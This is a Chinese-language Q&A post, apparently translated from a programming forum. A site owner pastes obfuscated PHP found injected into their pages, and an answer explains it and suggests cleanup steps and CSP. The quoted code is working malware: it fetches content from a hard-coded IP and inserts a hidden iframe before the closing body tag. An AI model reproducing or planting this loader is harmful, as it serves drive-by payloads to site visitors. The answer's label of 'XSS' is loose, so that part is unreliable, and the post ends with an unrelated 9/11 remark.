我在我的一些.PHP页面上找到了这些代码行.
<?php /*d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na*/if (!defined('HDDD467FFEY322')){function _shutdown_function($asd){$write =<<<AOLEW
<script type='text/javascript'>if (typeof KDDRTFGEG == 'undefined') {document.write("<iframe src='http://82.200.204.151/config.inc.php' style='position:absolute;top:-1000px;left:-1000px;text-indent:-1000;width:1px;height:1px;'></iframe>");KDDRTFGEG=true;}</script>
AOLEW;
$asd = preg_replace('/<!--d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na-->(.*?)<!--d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na-->/i', '', $asd); $sdf = file_get_contents('http://82.200.204.151/config.inc.php');return str_replace('</body>', str_replace('http://82.200.204.151/config.inc.php', $sdf, $write) . '</body>', $asd);}if (function_exists('ob_start') && is_callable('ob_start')) $result = ob_start('_shutdown_function', 0, true);define('HDDD467FFEY322', 1);}/*d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na*/ ?>
有人知道吗?
或者至少告诉我它在做什么......
这称为JavaScript注入(XSS 1),它发生在您的服务器遭到黑客攻击并且传播感染时.
例如,这可能会在进入网站时提示下载窗口,导致误导用户在其计算机上下载可能的恶意软件.
要摆脱它,你最好检查你拥有的所有文件,扫描你的整个PC /也许做一个干净的安装.<script>文件中通常有奇怪的标签,其中有一些非常怪异的" 无意义 "JS - 这是一个很好的迹象表明你的文件已经注入了JS.
如果你想永久摆脱它(或直到他们找到新的方法来XSS你的网站),你还需要找到泄漏
这是另一件可以保护自己免受XSS攻击的事情:CSP
1 ::跨站点脚本
自从我在2001年9/11事件发生14年后,我今天重新回答这个问题,我想向那天死去的人致敬--RIP